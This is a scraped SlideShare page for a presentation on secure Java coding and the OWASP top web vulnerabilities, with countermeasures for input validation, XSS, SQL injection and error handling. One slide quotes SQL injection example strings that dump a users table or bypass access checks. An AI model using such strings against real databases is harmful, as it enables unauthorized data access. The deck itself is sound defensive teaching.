Your SlideShare is downloading. ×
Web app security
Upcoming SlideShare
Loading in...5

Thanks for flagging this SlideShare!

Oops! An error has occurred.


Introducing the official SlideShare app

Stunning, full-screen experience for iPhone and Android

Text the download link to your phone

Standard text messaging rates apply

Web app security


Published on

Published in: Technology

1 Comment
  • Be the first to like this

No Downloads
Total Views
On Slideshare
From Embeds
Number of Embeds
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

No notes for slide
  • OWASP Top 10 Web Application Security Risks for 2010 are:A1: InjectionA2: Cross-Site Scripting (XSS)A3: Broken Authentication and Session ManagementA4: Insecure Direct Object ReferencesA5: Cross-Site Request Forgery (CSRF)A6: Security MisconfigurationA7: Insecure Cryptographic StorageA8: Failure to Restrict URL AccessA9: Insufficient Transport Layer ProtectionA10: Unvalidated Redirects and Forwards
  • Transcript

    • 1. Secure Java Coding Practices Araf Karsh Hamid June, 2006
    • 2. Rich Internet Applications History Architecture Nothing New Security Threats, Vulnerabilities & Defense Web Application Firewalls Web Application Security Concerns Secure Java Coding Practices Agenda
    • 3. Rich Internet Apps – History
    • 4. AJAX Vs. Traditional Web Applications Rich Internet Apps
    • 5. Security Threats, Vulnerabilities & Defense Web Application Firewalls Web Application Security Concerns Security
    • 6. Threats, Vulnerabilities & Defense
    • 7. Web Security Web Application Firewalls
    • 8. Web Application Security & Secure Java Coding Practices
    • 9. 1. Unvalidated Inputs 2. Cross-Site Scripting (XSS) 3. Injection Flaws 4. Improper Error Handling 5. Broken Authentication and Session Management 6. Insecure Direct Object References 7. Cross-Site Request Forgery (CSRF) 8. Security Misconfiguration 9. Insecure Cryptographic Storage 10. Failure to Restrict URL Access 11. Insufficient Transport Layer Protection Top 10 Web Vulnerabilities
    • 10. Attacker can change any value of the input submitted to the Web Server Re-validate all the inputs at the server Take only the necessary information (user input) from a for submission Un-validated Input
    • 11. Un-validated Input (Problem)
    • 12. Unvalidated Input (Fixed)
    • 13. Attacker Injects code into the input data Hide malicious code with Unicode Counter measures Input validations Input length check Cross Site Scripting
    • 14. Cross Site Scripting (Problem)
    • 15. Cross Site Scripting (Fixed)
    • 16. Attacker Can inject System commands Can inject other SQL Can override access checks Examples Add more commands “; select * from users;” Override access “’ OR 1=1;” Counter Measures Use prepared statements in SQL Run with limited privileges Filter / validate the input SQL Injection
    • 17. SQL Injection (Problem)
    • 18. SQL Injection (Fixed)
    • 19. Attacker Gets system information Gets Database information Examples Stack (Thread) Traces Database dump Counter Measures Sanitize the error message Avoid sending stack traces to end user. Customize error pages (HTTP errors 404 etc) Improper Error Handling
    • 20. Improper Error Handling (Problem)
    • 21. Improper Error Handling (Fixed)
    • 22. Questions?